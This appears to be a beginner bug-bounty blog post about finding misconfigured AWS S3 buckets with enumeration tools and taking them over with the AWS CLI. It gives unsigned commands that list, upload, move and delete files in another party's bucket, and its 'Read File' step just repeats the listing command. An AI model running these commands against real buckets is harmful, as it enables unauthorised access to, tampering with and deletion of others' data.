S3 Bucket Misconfiguration: From Basics to Pawn

Hello friends,

Recently I came across S3 Bucket Misconfiguration vulnerability on one of the private program. I saw many write-ups on how to exploit it but none of them was from Basics. So i thought why not to write a post on it from basic for the new comers of the community. I am trying my best to explore as much as I can.

PS: This post is for noobs like me who are not able to get how exactly to exploit misconfigured S3 Bucket. Leets please ignore the post. And this is the way by which I was able to takeover the misconfigured s3 bucket, yours might be changed.

So this post contains the following topics:

  1. Introduction
  2. How to find S3 Buckets
  3. Step by Step Guide to Takeover misconfigured S3 Bucket

 

 

Introduction:


What is AWS?
AWS stands for Amazon Web Services which is a secure cloud services platform, offering compute power, database storage, content delivery and other functionalities.

What is Amazon S3?
Amazon S3 stands for Amazon Simple Storage Service which is an object storage service that offers industry-leading scalability, data availability, security, and performance.

 

 

How to find S3 Buckets:


You can use many online tools which are available on GitHub to find S3 bucket of a website. I would like to list down few of them:
Lazy S3
bucket_finder
AWS Cred Scanner
sandcastle
Mass3
Dumpster Diver
S3 Bucket Finder
S3Scanner

and many more…

 

Step by Step Guide to Takeover misconfigured S3 Bucket:
This consists of many parts:

I) Finding S3 Bucket
To find S3 bucket of the program, I used nahamsec‘s lazys3.

 Command: ruby lazys3.rb site_name

 

The output of lazys3 comes with a S3 bucket.
http://[bucketname].s3.amazonaws.com/

 

II) S3 bucket identification
We can interact with the bucket with following kind of URL
http://[bucketname].s3.amazonaws.com/

Moreover, if the bucket has the property “Static website hosting”, it provides access to static HTML pages via the following URL:
http://[bucketname].s3-website-[region].amazonaws.com/

III) Installing AWS Command Line Interface
Now we have to install aws-cli (I prefer to use Kali Linux).

Command: pip install awscli

After installing, check whether it is perfectly installed or not.

Command: aws --version

IV) Making an Amazon AWS Account
For that make an account here and Fill the details and Sign in to the console

 

V) Getting Access Keys
After signing in, Go to https://console.aws.amazon.com/iam/ and click on Users

Add a new user

 

Now download CSV file and you will find your access keys.

VI) Configuring the AWS CLI
Go to your kali terminal and type

Command: aws configure

Now you are good to go.

VII) Checking for vulnerable S3 Bucket

Command: aws s3 ls s3://[bucketname]

Sometimes, you got this error so better to use this command.

Command: aws s3 ls s3://[bucketname] --no-sign-request

 

okay we are on right track.

Now there are few commands/operations you can try on it.

Read File: aws s3 ls s3://[bucketname] --no-sign-request

Move File: aws s3 mv yourfile s3://[bucketname]/test-file.txt --no-sign-request
Copy Files : aws s3 cp yourfile s3://[bucketname]/test-file.svg --no-sign-request


Delete Files : aws s3 rm s3://[bucketname]/test-file.svg --no-sign-request



So that’s all.
Some Reference Posts you may like to refer:
https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/?utm_source=blog&utm_campaign=s3_buckets
https://medium.com/bugbountywriteup/how-i-pwned-a-million-dollar-company-9fa5bfd234dd

 

Good bye and if you have any question, you can ask me on Twitter/Facebook. I will try to reply all of your messages asap 😉

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *